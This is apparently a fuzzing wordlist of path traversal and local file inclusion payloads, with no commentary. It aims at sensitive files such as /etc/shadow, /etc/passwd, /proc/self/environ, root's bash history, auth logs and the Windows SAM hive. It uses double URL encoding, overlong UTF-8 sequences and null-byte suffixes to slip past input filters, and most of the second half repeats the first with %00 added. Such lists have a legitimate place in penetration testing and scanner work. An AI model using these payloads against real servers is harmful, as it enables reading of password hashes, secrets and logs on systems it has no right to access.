../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/hosts
../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../proc/self/cmdline
../../../../../../../../../../../../proc/version
/var/log/apache2/access.log
/var/log/auth.log
../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../root/.bash_history
/etc/hostname
/etc/passwd
/proc/self/environ
../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../windows/system32/drivers/etc/hosts
../../../../../../../../../../../../boot.ini
%SYSTEMROOT%\win.ini
%SYSTEMROOT%\System32\drivers\etc\hosts
%SYSTEMROOT%\repair\SAM
../../../../../../../../../../../../WINDOWS/repair/SAM
../../../../../../../../../../../../windows/system32/config/system
%SYSTEMDRIVE%\boot.ini
%WINDIR%\debug\NetSetup.log
....\/....\/....\/....\/....\/....\/....\/etc/hosts
....//....//....//....//....//....//....//etc/hosts
%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/hosts
....\....\....\....\....\....\....\Windows\System32\drivers\etc\hosts
..//..//..//..//..//..//Windows//System32//drivers//etc//hosts
%5c..%5c..%5c..%5c..%5c..%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
%c0%af..%c0%af..%c0%af..%c0%af..%c0%afWindows%c0%afSystem32%c0%afdrivers%c0%afetc%c0%afhosts
../../../../../../../../../../../etc/hosts%00
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fhosts
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afhosts
%252e%252e%252e%252e%252e%252e%252e%252e%252fetc%252fhosts
..///////..////..//////etc/hosts
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/hosts
..\..\..\..\..\..\..\..\..\Windows\System32\drivers\etc\hosts%00
..%252f..%252f..%252f..%252f..%252f..%252f..%252fWindows%252fSystem32%252fdrivers%252fetc%252fhosts
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cWindows%c0%5cSystem32%c0%5cdrivers%c0%5cetc%c0%5chosts
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
..////..////..////Windows//System32//drivers//etc//hosts
%5C..%5C..%5C..%5C..%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Chosts
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../proc/self/environ%00
../../../../../../../../../../../../proc/self/cmdline%00
../../../../../../../../../../../../proc/version%00
/var/log/apache2/access.log%00
/var/log/auth.log%00
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../root/.bash_history%00
/etc/hostname%00
/etc/hosts%00
/proc/self/environ%00
../../../../../../../../../../../../windows/win.ini%00
../../../../../../../../../../../../windows/system32/drivers/etc/hosts%00
../../../../../../../../../../../../boot.ini%00
%SYSTEMROOT%\win.ini%00
%SYSTEMROOT%\System32\drivers\etc\hosts%00
%SYSTEMROOT%\repair\SAM%00
../../../../../../../../../../../../WINDOWS/repair/SAM%00
../../../../../../../../../../../../windows/system32/config/system%00
%SYSTEMDRIVE%\boot.ini%00
%WINDIR%\debug\NetSetup.log%00
....\/....\/....\/....\/....\/....\/....\/etc/hosts%00
....//....//....//....//....//....//....//etc/hosts%00
%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/hosts%00
....\....\....\....\....\....\....\Windows\System32\drivers\etc\hosts%00
..//..//..//..//..//..//Windows//System32//drivers//etc//hosts%00
%5c..%5c..%5c..%5c..%5c..%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts%00
%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts%00
%c0%af..%c0%af..%c0%af..%c0%af..%c0%afWindows%c0%afSystem32%c0%afdrivers%c0%afetc%c0%afhosts%00
../../../../../../../../../../../etc/hosts%00%00
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fhosts%00
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afhosts%00
%252e%252e%252e%252e%252e%252e%252e%252e%252fetc%252fhosts%00
..///////..////..//////etc/hosts%00
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/hosts%00
..\..\..\..\..\..\..\..\..\Windows\System32\drivers\etc\hosts%00%00
..%252f..%252f..%252f..%252f..%252f..%252f..%252fWindows%252fSystem32%252fdrivers%252fetc%252fhosts%00
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cWindows%c0%5cSystem32%c0%5cdrivers%c0%5cetc%c0%5chosts%00
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts%00
..////..////..////Windows//System32//drivers//etc//hosts%00
%5C..%5C..%5C..%5C..%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Chosts%00
